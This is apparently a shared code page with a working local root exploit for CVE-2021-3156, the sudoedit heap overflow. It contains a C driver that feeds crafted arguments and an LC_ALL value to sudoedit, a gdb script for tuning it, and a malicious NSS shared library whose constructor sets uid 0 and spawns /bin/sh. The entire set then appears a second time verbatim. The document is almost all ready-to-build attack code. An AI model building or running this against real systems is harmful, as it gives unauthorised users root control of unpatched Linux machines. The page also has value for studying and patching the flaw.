WinMin/CVE-2021-3156-exploit.c

## CVE-2021-3156-exploit.c
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <string.h>
/*
author: swing @ bestswngs@gmail.com

swpwn-pd@ubuntu:~/glibc-2.31$ uname -a
Linux ubuntu 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
swpwn-pd@ubuntu:~/glibc-2.31$ cat /etc/issue
Ubuntu 20.04.1 LTS \n \l
*/


#define REP0(X)
#define REP1(X) X,
#define REP2(X) REP1(X) X,
#define REP3(X) REP2(X) X,
#define REP4(X) REP3(X) X,
#define REP5(X) REP4(X) X,
#define REP6(X) REP5(X) X,
#define REP7(X) REP6(X) X,
#define REP8(X) REP7(X) X,
#define REP9(X) REP8(X) X,
#define REP10(X) REP9(X) X,

#define REP100(X) \
REP10(X) REP10(X) REP10(X) REP10(X) REP10(X) \
REP10(X) REP10(X) REP10(X) REP10(X) REP10(X)


#define REP1000(X) \
REP100(X) REP100(X) REP100(X) REP100(X) REP100(X) \
REP100(X) REP100(X) REP100(X) REP100(X) REP100(X)


int main(){
		int obufsz = 0x190;
		char obuf[obufsz];
		memset(obuf, 'B', sizeof(obuf));
		obuf[obufsz-2] = 0x5c;
		obuf[obufsz-1] = 0x00;


		char env_cont[0x1000];
		char env_val[0x1000];
		int env_valsz = 0xd0;
		memset(env_val,'Q',8);
		memset(env_val+8,'A',env_valsz-8);
		env_val[env_valsz] = '\0';
		sprintf(env_cont,"LC_ALL=C.UTF-8@%s",env_val);

		char *args[] = {
			"/usr/bin/sudoedit",
			"-s",
			obuf,
			"\\",
			NULL
		};

		int PAD1SZ = 8;
		char pad1[PAD1SZ] ;
		memset(pad1, 'C', sizeof(pad1));
		pad1[PAD1SZ-2]= 0x5c;
		pad1[PAD1SZ-1]= 0x00;


		char *extra_args[] = {
			pad1,
			REP1000("\\")
			"AAA\\",
			REP100("\\")
			REP10("\\")
			REP10("\\")
			REP10("\\")
			REP10("\\")
			REP10("\\")
			REP7("\\")
			"X/X\\",
			"a",
			env_cont,
			NULL,
		};

		execve(args[0], args, extra_args);
		// execvpe("./sudoedit", args, extra_args);

}

## gdbscript
# gcc CVE-2021-3156-exploit.c -o exploit
# gdb ./exploit -x gdbscript
catch exec
set breakpoint pending on
set follow-exec-mode new
r
b free if $r15==0xc && $r8==0
b __libc_dlopen_mode

## inject.c
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
mkdir libnss_X
gcc -Os -Wall -Wextra -fPIC -shared inject.c -o libnss_X/X.so.2
*/
static void __attribute__ ((constructor)) _init(void);

static void _init(void) {
	printf("[+] getroot!\n");
	setuid(0); seteuid(0); setgid(0); setegid(0);
	static char *a_argv[] = { "sh", NULL };
	static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL };
	execv("/bin/sh", a_argv);
}
	#define _GNU_SOURCE
	#include <stdio.h>
	#include <unistd.h>
	#include <string.h>
	/*
	author: swing @ bestswngs@gmail.com

	swpwn-pd@ubuntu:~/glibc-2.31$ uname -a
	Linux ubuntu 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
	swpwn-pd@ubuntu:~/glibc-2.31$ cat /etc/issue
	Ubuntu 20.04.1 LTS \n \l
	*/





	#define REP0(X)
	#define REP1(X) X,
	#define REP2(X) REP1(X) X,
	#define REP3(X) REP2(X) X,
	#define REP4(X) REP3(X) X,
	#define REP5(X) REP4(X) X,
	#define REP6(X) REP5(X) X,
	#define REP7(X) REP6(X) X,
	#define REP8(X) REP7(X) X,
	#define REP9(X) REP8(X) X,
	#define REP10(X) REP9(X) X,

	#define REP100(X) \
	REP10(X) REP10(X) REP10(X) REP10(X) REP10(X) \
	REP10(X) REP10(X) REP10(X) REP10(X) REP10(X)



	#define REP1000(X) \
	REP100(X) REP100(X) REP100(X) REP100(X) REP100(X) \
	REP100(X) REP100(X) REP100(X) REP100(X) REP100(X)



	int main(){
	int obufsz = 0x190;
	char obuf[obufsz];
	memset(obuf, 'B', sizeof(obuf));
	obuf[obufsz-2] = 0x5c;
	obuf[obufsz-1] = 0x00;



	char env_cont[0x1000];
	char env_val[0x1000];
	int env_valsz = 0xd0;
	memset(env_val,'Q',8);
	memset(env_val+8,'A',env_valsz-8);
	env_val[env_valsz] = '\0';
	sprintf(env_cont,"LC_ALL=C.UTF-8@%s",env_val);

	char *args[] = {
	"/usr/bin/sudoedit",
	"-s",
	obuf,
	"\\",
	NULL
	};

	int PAD1SZ = 8;
	char pad1[PAD1SZ] ;
	memset(pad1, 'C', sizeof(pad1));
	pad1[PAD1SZ-2]= 0x5c;
	pad1[PAD1SZ-1]= 0x00;


	char *extra_args[] = {
	pad1,
	REP1000("\\")
	"AAA\\",
	REP100("\\")
	REP10("\\")
	REP10("\\")
	REP10("\\")
	REP10("\\")
	REP10("\\")
	REP7("\\")
	"X/X\\",
	"a",
	env_cont,
	NULL,
	};

	execve(args[0], args, extra_args);
	// execvpe("./sudoedit", args, extra_args);

	}
	# gcc CVE-2021-3156-exploit.c -o exploit
	# gdb ./exploit -x gdbscript
	catch exec
	set breakpoint pending on
	set follow-exec-mode new
	r
	b free if $r15==0xc && $r8==0
	b __libc_dlopen_mode
	#include <unistd.h>
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>

	/*
	mkdir libnss_X
	gcc -Os -Wall -Wextra -fPIC -shared inject.c -o libnss_X/X.so.2
	*/
	static void __attribute__ ((constructor)) _init(void);

	static void _init(void) {
	printf("[+] getroot!\n");
	setuid(0); seteuid(0); setgid(0); setegid(0);
	static char *a_argv[] = { "sh", NULL };
	static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL };
	execv("/bin/sh", a_argv);
	}